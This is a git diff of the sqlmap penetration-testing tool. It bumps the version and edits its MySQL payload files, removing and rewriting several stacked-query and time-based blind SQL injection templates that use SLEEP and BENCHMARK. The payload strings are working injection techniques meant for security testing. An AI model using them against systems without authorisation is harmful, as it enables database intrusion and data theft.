diff --git a/lib/core/settings.py b/lib/core/settings.py index 04c5a0ec2..d03851fcf 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS from lib.core.revision import getRevisionNumber # sqlmap version (...) -VERSION = "1.0.5.94" +VERSION = "1.0.5.95" REVISION = getRevisionNumber() STABLE = VERSION.count('.') <= 2 VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev") diff --git a/xml/payloads/04_stacked_queries.xml b/xml/payloads/04_stacked_queries.xml index d156d693d..cf86feb4a 100644 --- a/xml/payloads/04_stacked_queries.xml +++ b/xml/payloads/04_stacked_queries.xml @@ -2,51 +2,10 @@ - - MySQL > 5.0.11 stacked queries (SLEEP - comment) - 4 - 1 - 1 - 0 - 1 - ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - # - - - - -
- MySQL - > 5.0.11 -
- - - - MySQL > 5.0.11 stacked queries (SLEEP) - 4 - 2 - 1 - 0 - 1 - ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - - - - -
- MySQL - > 5.0.11 -
- - MySQL > 5.0.11 stacked queries (comment) 4 - 2 + 1 1 0 1 @@ -67,7 +26,7 @@ MySQL > 5.0.11 stacked queries 4 - 3 + 2 1 0 1 diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml index 4f8223f24..a88659533 100644 --- a/xml/payloads/05_time_blind.xml +++ b/xml/payloads/05_time_blind.xml @@ -2,92 +2,10 @@ - - MySQL >= 5.0.12 AND time-based blind (SLEEP) - 5 - 1 - 1 - 1,2,3,9 - 1 - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - - - - -
- MySQL - >= 5.0.12 -
- - - - MySQL >= 5.0.12 OR time-based blind (SLEEP) - 5 - 1 - 3 - 1,2,3,9 - 1 - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - - - - -
- MySQL - >= 5.0.12 -
- - - - MySQL >= 5.0.12 AND time-based blind (SLEEP - comment) - 5 - 3 - 1 - 1,2,3,9 - 1 - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - # - - - - -
- MySQL - >= 5.0.12 -
- - - - MySQL >= 5.0.12 OR time-based blind (SLEEP - comment) - 5 - 3 - 3 - 1,2,3,9 - 1 - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - # - - - - -
- MySQL - >= 5.0.12 -
- - MySQL >= 5.0.12 AND time-based blind 5 - 2 + 1 1 1,2,3,9 1 @@ -107,7 +25,7 @@ MySQL >= 5.0.12 OR time-based blind 5 - 2 + 1 3 1,2,3,9 1 @@ -127,7 +45,7 @@ MySQL >= 5.0.12 AND time-based blind (comment) 5 - 4 + 3 1 1,2,3,9 1 @@ -148,7 +66,7 @@ MySQL >= 5.0.12 OR time-based blind (comment) 5 - 4 + 3 3 1,2,3,9 1 @@ -248,51 +166,10 @@ - - MySQL >= 5.0.12 RLIKE time-based blind (SLEEP) - 5 - 2 - 1 - 1,2,3,9 - 1 - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - - - - -
- MySQL - >= 5.0.12 -
- - - - MySQL >= 5.0.12 RLIKE time-based blind (SLEEP - comment) - 5 - 4 - 1 - 1,2,3,9 - 1 - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - # - - - - -
- MySQL - >= 5.0.12 -
- - MySQL >= 5.0.12 RLIKE time-based blind 5 - 5 + 2 1 1,2,3,9 1 @@ -312,7 +189,7 @@ MySQL >= 5.0.12 RLIKE time-based blind (comment) 5 - 5 + 4 1 1,2,3,9 1 @@ -1392,9 +1269,9 @@ 1 1,2,3,9 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END) @@ -1406,7 +1283,7 @@ - MySQL >= 5.0.12 time-based blind - Parameter replace (SLEEP) + MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) 5 3 1 @@ -1432,9 +1309,9 @@ 2 1,2,3,9 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]) @@ -1769,9 +1646,9 @@ 1 2,3 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)) - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))